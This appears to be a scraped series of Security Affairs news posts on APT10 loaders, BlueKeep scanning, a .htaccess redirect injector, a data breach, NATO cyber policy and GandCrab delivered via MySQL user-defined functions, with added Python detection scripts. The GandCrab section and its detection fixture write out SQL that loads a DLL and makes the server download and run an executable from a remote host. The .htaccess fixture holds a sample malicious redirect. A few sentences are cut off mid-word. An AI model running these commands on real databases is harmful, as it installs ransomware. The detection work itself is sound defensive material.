In July 2018, FireEye observed a series of new attacks by the group leveraging spear-phishing emails with weaponized Word documents that attempted to deliver the UPPERCUT backdoor, also tracked as ANEL.

In September 2018, researchers from FireEye uncovered and blocked a campaign by the Chinese APT10 cyber espionage group aimed at the Japanese media sector.

The recent attacks were uncovered by experts at enSilo, who also noticed that the APT group used modified versions of known malware.

“Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group.” reads the analysis published by enSilo. “Both of the loader’s variants and their various payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10.”

The two loaders deliver different payloads to the victims and both variants drop the following files beforehand:

  • jjs.exe – legitimate executable, the JVM-based JavaScript engine shell shipped with the Java platform, abused as the loader for the malware.
  • jli.dll – malicious DLL
  • msvcrt100.dll – legitimate Microsoft C Runtime DLL
  • svchost.bin – binary file

Both variants served several final payloads, including the PlugX and Quasar remote access trojan (RAT).


The loaders rely on DLL side-loading: they start a legitimate executable that is abused into loading a malicious DLL carrying the name of a library it expects to find next to itself.

Both loaders use the jli.dll library that maps a data file, svchost.bin, to memory and decrypts it to retrieve a shellcode that is injected into svchost.exe and contains the actual malicious payload.

The two loaders differ in the way they ensure persistence: the first uses a service as its persistence method, while the second variant leverages the Run registry key of the current user under the name “Windows Updata”.

“It goes a long way to completely remove any sign of McAfee’s email proxy service from the infected machine,” Hunter said. “Besides killing the process, it also makes sure to delete any related keys in the registry, and recursively deletes any related files and directories on the machine. The same behavior was observed in the paranoid variant as part of a VBScript the dropper runs.”

Experts noticed that the payloads used by the attackers in the latest campaigns are still in a development phase.

“Both variants of the loader implement the same decryption and injection mechanism.” conclude the experts.
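Added example, not enSilo's code: a detection pass over a process and autorun inventory of the kind an EDR or Sysmon export provides, flagging the side-loading setup described above (jjs.exe running outside a Java install while loading jli.dll from its own directory) and the Run-key persistence. The artifact names jjs.exe, jli.dll, svchost.bin and the value name "Windows Updata" are the ones enSilo reported; the inventory format, the sample paths and the Java install locations are assumptions.

```python
import ntpath
from dataclasses import dataclass, field

# Assumed locations of legitimate Java installs; jjs.exe found anywhere else
# is treated as suspicious. Windows paths are handled with ntpath so the
# check also runs on a Linux analysis box.
JAVA_HOMES = ("C:\\Program Files\\Java\\", "C:\\Program Files (x86)\\Java\\")


@dataclass
class Proc:
    image: str                                   # full path of the running executable
    modules: list = field(default_factory=list)  # full paths of loaded DLLs


def under_java_home(path):
    p = path.lower()
    return any(p.startswith(h.lower()) for h in JAVA_HOMES)


def sideload_hits(procs):
    """Return images of jjs.exe processes that run outside a Java install and
    load jli.dll from their own directory (the loader's side-loading setup).
    A svchost.bin next to such an image is the encrypted shellcode blob and
    is worth collecting from disk for analysis."""
    hits = []
    for proc in procs:
        if ntpath.basename(proc.image).lower() != "jjs.exe":
            continue
        if under_java_home(proc.image):
            continue  # the real Nashorn shell from a JDK/JRE
        image_dir = ntpath.dirname(proc.image).lower()
        for mod in proc.modules:
            if (ntpath.basename(mod).lower() == "jli.dll"
                    and ntpath.dirname(mod).lower() == image_dir):
                hits.append(proc.image)
                break
    return hits


def runkey_hits(run_values):
    """run_values: {value name: command} read from HKCU\\...\\CurrentVersion\\Run.
    Flag the reported value name and any entry that launches jjs.exe."""
    flagged = [name for name, cmd in run_values.items()
               if name.lower() == "windows updata" or "jjs.exe" in cmd.lower()]
    return sorted(flagged)


# Constructed inventory: one legitimate JDK shell, one side-loaded copy.
SAMPLE_PROCS = [
    Proc("C:\\Program Files\\Java\\jdk1.8.0_201\\bin\\jjs.exe",
         ["C:\\Program Files\\Java\\jdk1.8.0_201\\bin\\jli.dll"]),
    Proc("C:\\Users\\Public\\Libraries\\jjs.exe",
         ["C:\\Users\\Public\\Libraries\\jli.dll",
          "C:\\Users\\Public\\Libraries\\msvcrt100.dll"]),
    Proc("C:\\Windows\\System32\\svchost.exe", ["C:\\Windows\\System32\\ntdll.dll"]),
]
SAMPLE_RUN = {
    "OneDrive": "\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background",
    "Windows Updata": "C:\\Users\\Public\\Libraries\\jjs.exe",
}
```

The same logic extends to the service-based variant by checking service image paths for jjs.exe outside a Java install; the shellcode injected into svchost.exe is not visible in this inventory and needs memory inspection.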

Further technical details, including IoCs, are reported in the analysis published by enSilo.



Pierluigi Paganini

(SecurityAffairs – APT10, hacking)

The post APT10 is back with two new loaders and new versions of known payloads appeared first on Security Affairs.

BlueKeep scans observed from exclusively Tor exit nodes

GreyNoise experts detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability coming exclusively from Tor exit nodes.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including an RDS vulnerability dubbed BlueKeep that can be exploited to carry out WannaCry-like attacks.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker by connecting to the targeted system via RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities: it can be triggered without user interaction, making it possible for malware to spread in an uncontrolled way across target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of the zero-day broker Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Other experts also announced they had successfully developed exploits for BlueKeep, including Kaspersky, Check Point, and MalwareTech.

Experts at NCC Group released rules to detect exploitation attempts for this issue. A similar

News of the day is that an attacker started scanning for Windows systems vulnerable to BlueKeep (CVE-2019-0708), fortunately without attempting to exploit it.

The scans were first detected on May 25, 2019, by experts at GreyNoise; a single threat actor launched them through the Tor network to hide their identity.
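An added example, not GreyNoise's code or data: given a snapshot of Tor exit addresses and firewall logs of inbound connections to tcp/3389, this Python script separates RDP scanners that arrive through Tor exits from those that connect directly, which is the distinction GreyNoise drew. The exit list, the log format and every address below are constructed; a real run would load the exit list from the Tor Project's published exit-address list and the log from the perimeter firewall.

```python
import re
from collections import defaultdict

# Constructed snapshot of Tor exit addresses (documentation ranges, not real exits).
TOR_EXITS = {"198.51.100.7", "198.51.100.9", "203.0.113.44"}

# Constructed firewall log: one Tor-exit source sweeping three hosts on 3389,
# one Tor-exit source touching a single host, one direct scanner, and noise.
FW_LOG = """\
2019-05-25T03:14:07Z ACCEPT SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP DPT=3389
2019-05-25T03:14:08Z ACCEPT SRC=198.51.100.7 DST=10.0.0.6 PROTO=TCP DPT=3389
2019-05-25T03:14:09Z DROP SRC=198.51.100.7 DST=10.0.0.7 PROTO=TCP DPT=3389
2019-05-25T03:15:01Z ACCEPT SRC=192.0.2.10 DST=10.0.0.5 PROTO=TCP DPT=443
2019-05-25T03:16:22Z ACCEPT SRC=203.0.113.44 DST=10.0.0.5 PROTO=TCP DPT=3389
2019-05-25T03:20:00Z ACCEPT SRC=192.0.2.33 DST=10.0.0.5 PROTO=TCP DPT=3389
2019-05-25T03:20:01Z ACCEPT SRC=192.0.2.33 DST=10.0.0.6 PROTO=TCP DPT=3389
2019-05-25T03:20:02Z ACCEPT SRC=192.0.2.33 DST=10.0.0.7 PROTO=TCP DPT=3389
"""

LINE_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP DPT=(?P<dport>\d+)")


def rdp_sources(log_text):
    """Map each source address to the set of distinct hosts it touched on tcp/3389."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and m.group("dport") == "3389":
            targets[m.group("src")].add(m.group("dst"))
    return targets


def classify_rdp_scanners(log_text, tor_exits, min_targets=3):
    """Sources that hit at least min_targets RDP hosts count as scanners.
    Returns {src: 'tor-exit' | 'direct'} depending on the exit snapshot."""
    result = {}
    for src, dsts in rdp_sources(log_text).items():
        if len(dsts) >= min_targets:
            result[src] = "tor-exit" if src in tor_exits else "direct"
    return result


def all_via_tor(classification):
    """True when every scanner seen came through a Tor exit, the pattern
    GreyNoise reported for the first BlueKeep sweeps."""
    return bool(classification) and all(v == "tor-exit" for v in classification.values())
```

The threshold on distinct targets is what separates a sweep from a single stray connection; tune it to the size of the monitored range, and refresh the exit snapshot often, since exit addresses change daily.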

Experts believe it is only a matter of time until security firms detect exploitation attempts in the wild.



Pierluigi Paganini

(SecurityAffairs – hacking, Windows BlueKeep)

The post BlueKeep scans observed from exclusively Tor exit nodes appeared first on Security Affairs.

Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects

Security researchers are monitoring a new hacking campaign aimed at Joomla and WordPress websites in which attackers use an .htaccess injector for malicious redirects.

Researchers at Sucuri are warning Joomla and WordPress website admins of a malicious hypertext access (.htaccess) injector found on a client website. The compromised website was used by attackers to redirect traffic to advertising sites that attempted to deliver malware.

“During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website. ” reads the report.

.htaccess files are per-directory configuration files for the Apache HTTP Server. They can override parts of the server configuration to enable or disable functionality, including URL redirects, password protection of content, and image hotlink prevention.

Sucuri spotted threat actors abusing the URL redirect function of the .htaccess file to send visitors of compromised websites to phishing sites, sites delivering malware, or simply to generate advertising impressions.

At this time it is not clear how the attackers gained access to the Joomla and WordPress websites; what is known is that they injected the malicious code into some of the websites’ index.php files.

“Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:


“This code is searching for an .htaccess file. If found, this code will place malicious redirects in the file immediately after “# BEGIN WORDPRESS”.” continues the report.

Endpoint antivirus software shows a warning when a user is redirected from a compromised Joomla or WordPress site to the malicious site.

The PHP code also walks nested folders looking for further .htaccess files to infect.
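Added example, not Sucuri's code: a small scanner that walks a site tree for .htaccess files containing redirect directives pointing off-site, and that checks for a redirect sitting right after the "# BEGIN WordPress" marker, the placement the report describes. The sample directives, the malicious.example host and the directory tree are constructed for the demo.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Apache directives that can send a visitor elsewhere, and the URLs inside them.
REDIRECT_RE = re.compile(r"^\s*(RewriteRule|Redirect(?:Match|Permanent|Temp)?)\s", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\[\]\"']+", re.IGNORECASE)
WP_BEGIN = "# begin wordpress"

# The block WordPress itself manages (clean).
CLEAN_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Constructed approximation of an injected file: an off-site rule placed right
# after the marker, before the block WordPress manages. The host is made up.
INJECTED_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (android|iphone) [NC]
RewriteRule ^(.*)$ http://malicious.example/XcTyTp [R=302,L]
""" + CLEAN_HTACCESS.split("\n", 1)[1]


def external_redirects(text, own_hosts):
    """Return (lineno, host, directive) for redirects whose target host is not ours."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not REDIRECT_RE.match(line):
            continue
        for url in URL_RE.findall(line):
            host = (urlparse(url).hostname or "").lower()
            if host and host not in own:
                findings.append((n, host, line.strip()))
    return findings


def injected_after_wp_marker(text):
    """True when a redirect directive sits between '# BEGIN WordPress' and the
    <IfModule mod_rewrite.c> block, where WordPress never writes one."""
    lines = text.splitlines()
    start = next((i for i, l in enumerate(lines) if l.strip().lower() == WP_BEGIN), None)
    if start is None:
        return False
    for line in lines[start + 1:]:
        if line.strip().lower().startswith("<ifmodule"):
            return False
        if REDIRECT_RE.match(line):
            return True
    return False


def scan_tree(root, own_hosts):
    """Walk the whole tree (the injector recurses into nested folders too) and
    report every .htaccess with off-site redirects, keyed by relative path."""
    report = {}
    for dirpath, _, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="ignore") as fh:
            hits = external_redirects(fh.read(), own_hosts)
        if hits:
            report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def build_sample_site():
    """Constructed site tree: two injected files, one clean one."""
    root = tempfile.mkdtemp(prefix="site-")
    for sub, content in ((".", INJECTED_HTACCESS), ("wp-content/uploads", INJECTED_HTACCESS),
                         ("wp-admin", CLEAN_HTACCESS)):
        os.makedirs(os.path.join(root, sub), exist_ok=True)
        with open(os.path.join(root, sub, ".htaccess"), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root
```

Cleaning the files is not enough on its own: the injector lives in a PHP file (index.php in the report) and rewrites every .htaccess it can reach, so the dropper has to be found and removed first, and file integrity monitoring on .htaccess is the cheap way to catch a reinfection.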

It’s not uncommon to see attackers abusing .htaccess handling. In October 2018, a security researcher disclosed a vulnerability, tracked as CVE-2018-9206, that had affected older versions of the jQuery File Upload plugin since 2010. Attackers exploited the issue to carry out several malicious activities, including defacement, data exfiltration, and malware infection.

alled jQuery File Upload placed 7,800 different software applications at potential risk for compromise and remote code-execution.

The root cause of that problem was that Apache stopped honouring .htaccess files by default starting with version 2.3.9, both to improve performance (the server no longer has to look for the file in every directory it accesses) and to prevent users from overriding security features configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

“While the majority of web applications make use of redirects, these features are also commonly used by bad actors to generate advertising impressions, send unsuspecting site visitors to phishing sites, or other malicious web pages.” concludes Sucuri.



Pierluigi Paganini

(SecurityAffairs – .htaccess, hacking)

The post Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects appeared first on Security Affairs.

Hacker breached Perceptics, a US maker of license plate readers

Perceptics, a maker of vehicle license plate scanning solutions used in the US, has been hacked; the attackers stole data and offered it for free on the dark web.

Perceptics is a leading vendor of license plate readers (LPRs), license plate recognition systems and vehicle identification products. The company was hacked, and the attackers stole data and offered business plans, financial documents, and personal information for free on the dark web.

LPRs manufactured by Perceptics are installed at all land border crossing lanes for privately owned vehicle (POV) traffic in the United States and Canada, and at the most critical lanes in Mexico.

Last week, a hacker who goes by the moniker ‘Boris Bullet-Dodger’ reported the hack to The Register and showed it a list of files as proof of the attack.


The hacker stole hundreds of gigabytes of files along with Microsoft Exchange and Access databases, ERP databases, HR records, and Microsoft SQL Server data stores.

The name ‘Boris’ is not new to the cyber security industry: it is the moniker of the hacker who breached the IT provider CityComp at the end of April.

Stolen data include some databases and company documents.

“The file names and accompanying directories – numbering almost 65,000 – fit with the focus of the surveillance technology biz.” reads the post published by El Reg. “They include .xlsx files named for locations and zip codes, .jpg files with names that refer to “driver” and “scene,” .docx files associated with presumed government clients like ICE, and date-and-time stamped .jpgs and .mp4 files.”

Perceptics confirmed the incident and reported it to the authorities, the company did not provide technical details about the hack.



Pierluigi Paganini

(SecurityAffairs – Perceptics, data breach)

The post Hacker breached Perceptics, a US maker of license plate readers appeared first on Security Affairs.

Security Affairs newsletter Round 215 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.



Dutch intelligence investigate alleged Huawei ‘backdoor’
Salesforce faced one of its biggest service disruption of ever
Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk
Amnesty International filed a lawsuit against Israeli surveillance firm NSO
Chronicle experts spotted a Linux variant of the Winnti backdoor
Data belonging to Instagram influencers and celebrities exposed online
Defiant Tech firm who operated LeakedSource pleads guilty
Google will block Huawei from using Android and its services
Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS
After latest Microsoft Windows updates some PCs running Sophos AV not boot
Emsisoft released a free Decrypter for JSWorm 2.0
Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones
MuddyWater BlackWater campaign used new anti-detection techniques
US Commerce Department delays Huawei ban for 90 Days
ActiveX Controls in South Korean websites are affected by critical flaws
Emsisoft released a free Decrypter for the GetCrypt ransomware
G Suite users passwords stored in plain-text for more than 14 years
SandboxEscaper is back with a new Windows Zero-Day in Task Scheduler
The Satan Ransomware adds new exploits to its arsenal
Anonymous and LulzSec target the Italian Police and doctors
Playing Cat and Mouse: Three Techniques Abused to Avoid Detection
PoC Exploits for CVE-2019-0708 wormable Windows flaw released online
SandboxEscaper disclosed 3 Microsoft zero-day flaws in 24 hours
Tor Browser for Android is available through the Play Store
UK provided evidence to 16 NATO allies of Russia hacking campaigns
Chronicles study reveals CAs that issued most certificates to sign malware samples on VirusTotal
Facebook says it took down 2.19 billion accounts in Q1 2019
How Hackers Access Direct Deposit Paycheck — And What to Do About It
US DoJs superseding indictment charges Assange with violating Espionage Act
0patch issued a micropatch to address the BlueKeep flaw in always-on servers
GitHub introduces new tools and security features to secure code
Hackers target MySQL databases to deliver the GandCrab ransomware
Snapchat staff used internal tools to spy on users

Pierluigi Paganini

(SecurityAffairs – newsletter)



The post Security Affairs newsletter Round 215 – News of the week appeared first on Security Affairs.

Remarks on NATO and its approach to the cyber offensive

This week NATO Secretary General Jens Stoltenberg explained at the Cyber Defence Pledge conference in London how the Alliance is countering cyber threats.

This week during the Cyber Defence Pledge conference in London, NATO Secretary General Jens Stoltenberg explained how the Alliance is countering cyber threats.

Stoltenberg declared that NATO is pushing the limits of what the Alliance can do in cyberspace, adopting a more aggressive approach to offensive cyber operations.

The Secretary General confirmed that the Alliance will not limit its response to cyberspace when it is attacked in cyberspace.

“We are not limited to respond in cyberspace when we are attacked in cyberspace,” said Stoltenberg.

NATO allies, he added, have already “agreed to integrate national cyber capabilities or offensive cyber into Alliance operations and missions.”


The Secretary General explained that cyber-attacks can be as damaging as conventional attacks. A cyber attack can cause billions of dollars’ worth of damage to our economies, paralyse critical infrastructure, undermine democracies.

Unfortunately, cyber attacks are becoming more frequent, more complex and more destructive.

“NATO is not immune. We register suspicious events against NATO cyber systems every day. And cyber threats will become more dangerous with the development of new technologies. Such as artificial intelligence, machine learning and deep fakes.” said Stoltenberg.

“These technologies are fundamentally changing the nature of warfare. As much as the industrial revolution did. NATO is adapting to this new reality.”

Since 2016, NATO members have agreed that a cyber attack against one of them could trigger a military response under Article 5.

It has to be remarked, however, that the conditions under which NATO would respond to a cyber attack remain formally undefined.

NATO was born as a defensive alliance; now it is shifting its posture toward a more aggressive approach. A response under Article 5 could take many different forms and span different warfare domains.

“And at our Summit in Brussels last year, we agreed to establish a Cyberspace Operations Centre. At the heart of our military command structure.” continues the Secretary General. “And we have agreed to integrate national cyber capabilities or offensive cyber into Alliance operations and missions. All of this has made NATO more effective in cyberspace.”

The Alliance is currently building a cyber command that will be fully operational in 2023; the command will coordinate and conduct all of the Alliance’s offensive cyber operations. Until then, NATO will likely rely on its Allies for offensive operations, first and foremost US Cyber Command.

Let me suggest reading the remarks by NATO Secretary General Jens Stoltenberg at the Cyber Defence Pledge Conference in London; it is a very interesting discussion that includes his responses to questions from the attendees.



Pierluigi Paganini

(SecurityAffairs – North Atlantic Treaty Organization, cyber offensive)

The post Remarks on NATO and its approach to the cyber offensive appeared first on Security Affairs.

Hackers target MySQL databases to deliver the GandCrab ransomware

Security experts at Sophos have detected a wave of attacks targeting Windows servers running MySQL databases with the intent of delivering the GandCrab ransomware.

Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases, threat actors aim at delivering the GandCrab ransomware.

This is the first time the company has seen hackers targeting Windows servers running MySQL databases to infect them with ransomware.

The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the “set” command to load all the bytes of a helper DLL into a variable in memory and writes the contents of that variable to a database table named yongger2.

The attacker then concatenates the bytes into one file and drops it into the server’s plugin directory. Analysis of the DLL revealed that it exposes the xpdl3, xpdl3_deinit, and xpdl3_init functions, the entry points MySQL expects from a user-defined function (UDF) library.

The attacker then drops the yongger2 table and any existing function named xpdl3. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) backed by the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe') 

With this scheme the attacker instructs the database server itself to download the GandCrab payload from the remote machine, drop it in the root of the C: drive as isetup.exe, and execute it.
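Added example, not Sophos' code: a detection pass over MySQL general-log lines that flags each step of the chain described above (a DLL staged through a user variable, a write into the plugin directory, CREATE FUNCTION ... SONAME, and a call of the new UDF carrying a download URL) and ties them together per connection. The log lines, the connection ids, the 192.0.2.10 address and the file paths are constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed general-log excerpt: connection 12 replays the attack chain,
# connection 13 is ordinary application traffic.
SAMPLE_GENERAL_LOG = r"""
2019-05-19T12:00:01Z   12 Connect  root@192.0.2.10 on  using TCP/IP
2019-05-19T12:00:02Z   12 Query    set @a = concat('', 0x4d5a90000300000004000000ffff0000b8000000)
2019-05-19T12:00:03Z   12 Query    insert into yongger2 values(@a)
2019-05-19T12:00:04Z   12 Query    select data from yongger2 into dumpfile 'C:\\ProgramData\\MySQL\\lib\\plugin\\cna12.dll'
2019-05-19T12:00:05Z   12 Query    drop table yongger2
2019-05-19T12:00:06Z   12 Query    CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
2019-05-19T12:00:07Z   12 Query    select xpdl3('http://192.0.2.10:5471/3306-1.exe','c:\\isetup.exe')
2019-05-19T12:00:08Z   12 Quit
2019-05-19T12:01:00Z   13 Connect  app@10.0.0.8 on shop using TCP/IP
2019-05-19T12:01:01Z   13 Query    set @n = 0x01
2019-05-19T12:01:02Z   13 Query    select id, total from orders where id = 42
"""

LOG_RE = re.compile(r"^\S+\s+(?P<cid>\d+)\s+(?P<cmd>\w+)\s*(?P<sql>.*)$")
RULES = [
    # a user variable seeded with bytes that start with the PE "MZ" header
    ("dll-in-variable", re.compile(r"\bset\s+@\w+\s*=.*0x4d5a", re.I)),
    # a DUMPFILE write aimed at the plugin directory or at a .dll
    ("plugin-dir-write", re.compile(r"into\s+dumpfile\s+'[^']*(plugin|\.dll)", re.I)),
    # a UDF registered from a shared library
    ("udf-load", re.compile(r"create\s+function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)),
]
URL_RE = re.compile(r"https?://[^'\"\s)]+", re.I)


def analyze(log_text):
    """Return {connection id: {'rules': set, 'udfs': set, 'urls': list}} for
    every connection that tripped at least one rule. UDF names registered on
    any connection are remembered so a later call from another session is
    still caught."""
    state = defaultdict(lambda: {"rules": set(), "udfs": set(), "urls": []})
    known_udfs = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("cmd").lower() != "query":
            continue
        cid, sql = m.group("cid"), m.group("sql")
        for name, rx in RULES:
            hit = rx.search(sql)
            if hit:
                state[cid]["rules"].add(name)
                if name == "udf-load":
                    known_udfs.add(hit.group(1).lower())
                    state[cid]["udfs"].add(hit.group(1).lower())
        for udf in known_udfs:
            if re.search(r"\b" + re.escape(udf) + r"\s*\(", sql, re.I):
                state[cid]["rules"].add("udf-call")
                state[cid]["urls"].extend(URL_RE.findall(sql))
    return {cid: v for cid, v in state.items() if v["rules"]}


def udf_attack_chains(log_text):
    """Connections that both loaded a UDF from a DLL and invoked it: the
    complete chain Sophos saw hit its honeypot."""
    return sorted(cid for cid, v in analyze(log_text).items()
                  if {"udf-load", "udf-call"} <= v["rules"])
```

The general log is expensive in production, but the same rules fit an audit plugin or a database proxy. On the hardening side the chain needs the FILE privilege and a writable plugin_dir, so a non-empty secure_file_priv, a read-only plugin directory, a non-root account for the application, and not exposing tcp/3306 to the internet each break it.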

According to Sophos, at least one Chinese threat actor is currently carrying out such attacks, scanning the internet for Windows servers running MySQL databases.

“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.

“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.

The GandCrab sample that targeted the honeypot was downloaded more than 500 times. That sample was not the only one: counted together, experts estimated nearly 800 downloads in five days, plus more than 2,300 downloads of the other GandCrab sample in the open directory.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.

“Counted together, there has been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.”

The researchers pointed out that this isn’t a massive or widespread attack; nonetheless it represents a serious risk for MySQL server admins who have exposed their installs online.



Pierluigi Paganini

(SecurityAffairs – MySQL databases, GandCrab)

The post Hackers target MySQL databases to deliver the GandCrab ransomware appeared first on Security Affairs.